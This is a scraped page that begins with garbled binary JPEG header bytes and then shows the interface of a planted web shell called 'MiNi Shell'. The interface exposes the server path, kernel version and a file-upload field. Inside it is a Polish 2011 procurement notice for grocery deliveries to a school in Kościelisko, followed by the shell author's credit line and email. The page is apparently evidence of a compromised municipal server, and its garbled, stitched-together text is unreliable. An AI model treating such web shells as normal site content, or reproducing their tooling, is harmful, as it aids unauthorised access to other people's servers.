JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111220/432736-N-2011.html

<p class="kh_header"><b>Kościelisko: Dostawa artykułów spożywczych na potrzeby
 Zespołu Szkół Gimnazjum i Szkoła Podstawowa w Kościelisku.</b><br>
<b>Numer ogłoszenia: 432736 - 2011; data zamieszczenia: 20.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kościelisko , ul. Strzelców Podhalańskich 44, 34-511 Kościelisko, woj. małopolskie, tel. 018 2079100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koscielisko.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych na potrzeby
 Zespołu Szkół Gimnazjum i Szkoła Podstawowa w Kościelisku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych na potrzeby Zespołu Szkół Gimnazjum                     i Szkoła Podstawowa w Kościelisku, 34-511 Kościelisko, ul. Szeligówka 660 zgodnie z warunkami wynikającymi                     z obowiązujących przepisów, w szczególności ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. nr 171, poz.1225), postanowieniami SIWZ.

1.	Szczegółowy opis przedmiotu zamówienia określony jest w załączniku nr 5 do niniejszej specyfikacji i jest podzielony na 5 pakietów tj.
	I -Mięso i wędliny;
	II - Artykuły nabiałowe;
	III - Artykuły sypkie, przyprawy i przetwory;
	IV - Owoce, warzywa, mrożonki, ryby i jajka;
	V - Pieczywo.
2.	Zamawiający informuje, że określone pakiety zawierają maksymalną ilość artykułów i zastrzega on sobie prawo zamawiania mniejszej ilości w zależności od posiadanych środków finansowych oraz potrzeb. Z tego tytułu wykonawcy nie przysługuje żadne roszczenie w stosunku do zamawiającego.
3.	Wykonawca ma dostarczać artykuły spożywcze własnym transportem, którego koszt ma być wliczony w cenę oferto-wą.
4.	Wykonawca musi zagwarantować odpowiedni okres ważności dostarczanych produktów (min. 7 dni), licząc od dnia dostawy.
5.		Dostarczane artykuły żywnościowe muszą być odpowiednio posortowane przez wykonawcę i muszą być najwyższej jakości, w tym przede wszystkim muszą odpowiadać wymaganiom jakościowym stosownie do obowiązujących przepisów oraz muszą spełniać obowiązujące w tym zakresie normy sanitarno-epidemiologiczne, a także muszą być przechowywane i transportowane w warunkach gwarantujących najwyższą jakość. Ponadto mięso i wędliny mają być dostarczane w czystych plastikowych pojemnikach dopuszczonych do kontaktu z żywnością spełniających wymogi sanitarno-higieniczne.
6.		Dostarczane artykuły spożywcze w zależności od ich kategorii muszą przy każdej dostawie posiadać wszystkie niezbędne dokumenty wymagane przepisami prawa żywnościowego.
7.		Zamawiający informuje, że ilekroć przedmiot zamówienia określony w specyfikacji istotnych warunków zamówienia i w załącznikach do specyfikacji istotnych warunków zamówienia opisany jest przez wskazanie znaku towarowego,         patentu lub pochodzenia dopuszcza się rozwiązania równoważne, z zastrzeżeniem, iż proponowane rozwiązania  będą posiadały parametry nie gorsze niż wymagane przez zamawiającego, posiadały wymagane atesty, spełniały normy. Wykazanie równoważności zaoferowanego przedmiotu spoczywa na Wykonawcy, który jest obowiązany wykazać, że oferowane przez niego artykuły  spełniają wymagania określone przez zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówień uzupełnijących mogą być dostawy artykułów spożywczych na potrzeby Zespołu Szkół Gimnazjum                     i Szkoła Podstawowa w Kościelisku, 34-511 Kościelisko, ul. Szeligówka 660 .</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.22.10.00-3, 03.14.25.00-3, 03.22.00.00-9, 15.51.00.00-6, 15.54.40.00-3, 15.53.00.00-2, 15.55.10.00-5, 15.89.60.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawijący nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Wykonawca spełni ww. warunek jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy prawo za-mówień publicznych według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Wykonawca spełni ww. warunek jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy prawo za-mówień publicznych według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Wykonawca spełni ww. warunek jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy prawo za-mówień publicznych według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Wykonawca spełni ww. warunek jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy prawo za-mówień publicznych według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Wykonawca spełni ww. warunek jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy prawo za-mówień publicznych według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany umowy mogą być dokonywane w przypadku gdy takie założenie było dopuszczone w postępowaniu o udzielenie zamówienia będącym podstawą do zawarcia niniejszej umowy. Zmiany umowy mogą być dokonywane na następujących zasadach:
1)	W przypadku zmiany danych teleadresowych, osób reprezentujących firmę przedstawionych w umowie - na wniosek Zamawiającego lub Wykonawcy.
2)	W przypadku zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy.
3)	W przypadku zmiany stawki podatku VAT.
4)	W przypadku gdy zmiany treści umowy są korzystne dla Zamawiającego a Wykonawca nie wyrazi sprzeciwu co do wprowadzenia tych zmian.
2.	Zmiany umowy nie mogą być dokonywane w stosunku do kryteriów, które były oceniane w postępowaniu przetargowym stanowiącym podstawę do zawarcia niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koscielisko.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kościelisko - 34-511 Kościelisko ul. Strzelców Podhalańskich 44 (pokój nr 11).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.12.2011 godzina 10:00, miejsce: Urząd Gminy Kościelisko - 34-511 Kościelisko ul. Strzelców Podhalańskich 44 (pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso, wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Mięso świeżo mielone	180	kg
2.		Mięso - schab wieprzowy z kością	300	kg
3.		Mięso- pieczeń wieprzowa	150	kg
4.		Mięso- łopatka wieprzowa	280	kg
5.		Boczek wędzony	80	kg
6.		kurczaki	200	kg
7.		Filet z kurczaka	150	kg
8.		Filet z indyka	150	kg
9.		Udko z kurczaka	80 	kg
10.		Kiełbasa zwyczajna	145	kg
11.		Mortadela	80	kg
12.		Kiełbasa szynkowa	5	kg
13.		Parówki typu bobaski 330 g	185	szt.
14.		Pasztet drobiowy typu Drop 160g	150 	szt.
15.		Szynka z indyka	10	kg 
16.		Pasztet pieczony	5	kg
17.		Szynka gotowana	10	kg
18.		Szynka domowa wieprzowa	10	kg
19.		Szynka biała extra	10 	kg
20.		Szynka konserwowa	10	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Artykułu nabiałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Jogurt owocowy 125 ml	2000	szt.
2.		Kefir 400ml	200	szt.
3.		Margaryna mleczna 250g	320	szt.
4.		Mleko karton 2% 1l typu Hej	1700	szt.
5.		Śmietana łaciata 18% 0,5l	250	szt.
6.		Masło 200g typu extra Mońki	730	szt.
7.		Śmietana 18% 400g	500	szt.
8.		Ser biały półtłusty	120	kg
9.		Ser topiony kostka 100g	270	szt.
10.		Ser żółty salami	15	kg
11.		Ser żółty edamski	30	kg
12.		Bryndza 125g	20	szt.
13.		Ser żółty gouda	40	kg
14.		Ser żółty wędzony	5	kg
15.		Salami wędzone	5	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Artykuły sypkie, przyprawy i przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Brzoskwinie w syropie 820 g	15	szt.
2.		Barszcz czerwony koncentrat typu Krakus 250 ml	15	szt.
3.		Chrzan tarty typu Polonaise 180 g	30	szt.
4.		Cukier kryształ	580	kg
5.		Cukier puder 0,5 kg	5	kg
6.		Cukier waniliowy 32g	100	szt.
7.		Cynamon 15 g typu Prymat	40	szt.
8.		Czosnek granulowany 20 g typu Prymat	45	szt.
9.		Dżem owocowy mix 280g typu Łowicz	170	szt.
10.		Krem Nutella 350g	15	szt.
11.		Galaretka owocowa 79g typu Winiary	85	szt.
12.		Groszek konserwowy 400 g typu Pudliszki	20	szt.
13.		Budyń 40g typu Winiary	100	szt.
14.		Herbata indyjska granulowana 100 g typu Mokate	50	szt.
15.		Herbata ekspresowa 100 szt. typu Saga	10	szt.
16.		Kukurydza konserwowa typu Pudliszki 400g	20	szt.
17.		Kasza jęczmienna mazurska średnia	120	kg
18.		Kakao typu Puchatek 500 g	45	szt.
19.		Kawa typu Inka 300g	25 	szt.
20.		Kwasek cytrynowy 20g typu Prymat	30	szt.
21.		Ketchup łagodny 250g typu Tortex	45	szt.
22.		Kminek 20g typu Prymat	30	szt.
23.		Kisiel 77g typu Winiary mix	260	szt.
24.		Przyprawa do potraw typu Kucharek 1 kg	30	szt.
25.		Przyprawa do mięs 1 kg typu Delikat	5	szt.
26.		Liść laurowy - 6 g typu Prymat	30	szt.
27.		Mąka ziemniaczana	5	kg
28.		Mąka pszenna typu Lubella 	350 	kg
29.		Makaron kokarda 500g typu Martiono	30	kg
30.		Makaron gwiazdki typu Martino	25	kg
31.		Makaron muszelka mała typu Martino	25	kg
32.		Makaron świder typu Martino	60	kg
33.		Makaron kolanko małe typu Martino	30	kg
34.		Makaron muszla duża typu Martino	60	kg
35.		Makaron ryżowy typu Martino	25	kg

36.		Makaron nitka rosołowa typu Majer	30	kg
37.		Majonez kielecki 500 ml typu Społem	20	szt.
38.		Majeranek 6g	35	szt.
39.		Maggi przyprawa do potraw 1l typu Maggi	15	szt.
40.		Olej typu Kujawski 3l	150	szt.
41.		Ocet 500ml	20	szt.
42.		Przecier pomidorowy typu Złoty Bażant 400 g	110	szt.
43.		Płatki kukurydziane typu Lubella 1000g	50	szt.
44.		Płatki kukurydziane kółka miodowe 1000g typu Lubella	50	szt.
45.		Płatki kukurydziane kulki czekoladowa 1000g typu Lubella	50	szt.
46.		Proszek do pieczenia 36g	50	szt.
47.		Musztarda stołowa 0,5 l typu Roleski	12	szt.
48.		Ryż biały typu Sonko	250	kg
49.		sól	170 	kg
50.		Pieprz naturalny czarny mielony 50g	50	szt.
51.		Sałatka grecka typu Artos 0,9l	130	szt.
52.		Sałatka z czerwonej kapusty typu Artos 0,9l	100	szt.
53.		Ziele angielskie 20g	30	szt.
54.		Żurek tradycyjny 0,5l	100	szt.
55.		Ciastka herbatniki 0,14g	200	szt.
56.		Wafelki w czekoladzie 36g typu Grześki	250	szt.
57.		Sok owocowy typu Caprio 2l	80	szt.
58.		Napój owocowy 0,2l typu Cymes	100	szt.
59.		Woda mineralna 0,5l typu Kuracjusz bezkidzki	200	szt.
60.		Napój owocowy typu Tymbark 0,5l	150	szt.
61.		Wafelki typu Gimi 20g	400	szt.
62.		Placki ziemniaczane w proszku typu Knorr 1500g	30	szt.
63.		Kasza manna	30	kg
64.		Papryka słodka 20g	30	szt.
65.		Czekolada typu Wawel nadziewana truskawkowa 100g	50	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Owoce, warzywa, mrożonki, ryby, jajka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		brzoskwinie	15	kg
2.		banany	110	kg
3.		Buraki czerwone	220	kg
4.		cebula	100	kg
5.		cytryny	40	kg
6.		Czosnek główka	5	kg
7.		Fasola Jaś średni 0,5 kg	65	szt.
8.		Fasola szparagowa mrożona	100	kg
9.		Groch łuskany 0,5 kg	20	szt.
10.		Grzyby pieczarki	60	kg
11.		jabłka	400	kg
12.		jaja	5800	szt.
13.		jagody	10	kg
14.		Kapusta biała	80	kg
15.		Kapusta włoska	7	szt.
16.		Kapusta pekińska 	30	szt. 
17.		Kapusta kiszona 	300	kg
18.		kalafior	30	szt.
19.		Koper zielony wiązka	120	szt.
20.		Marchew 	360	kg
21.		mandarynki	50	kg
22.		Zupa jarzynowa 7 składnikowa mrożona	40	kg
23.		Marchew z groszkiem mrożona	75	kg
24.		Mieszanka kompotowa mrożona	330	kg
25.		Ogórki zielone 	40	kg
26.		Ogórki kiszone	150	kg
27.		pomidory	60	kg
28.		por	10	szt.
29.		pomarańcze	30	kg
30.		Pietruszka zielona wiązka	320	szt.
31.		Pietruszka biała korzeń	10	kg
32.		Rzodkiewka wiązka	110	szt.
33.		Ryba- filet z mintaja  mrożony szater	210	kg
34.		Ryba- filet z makreli w pomidorach 170g	125	szt.
35.		Seler korzeń	70	kg
36.		Sałata zielona	130	szt.
37.		Szczypiorek wiązka	100	szt.
38.		śliwki	10	kg
39.		Truskawki świeże	20	kg
40.		Truskawki mrożone	70	kg
41.		winogrona	35	kg
42.		ziemniaki	6000	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Bułka kajzerka 30g	180	szt.
2.		Bułka kajzerka 60g	230	szt.
3.		Bułka tarta  0,5kg	130	szt.
4.		Chleb pszenno- żytni krojony 600g	700	szt.
5.		Weka 500 g	650	szt.
6.		drożdżówka	650 	szt.
7.		pączki	100	szt.
8.		bułki	700	szt.
9.		Ciasto drożdżowe 0,6 kg	20	szt.
10.		Babka piaskowa 0,7 kg	20 	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com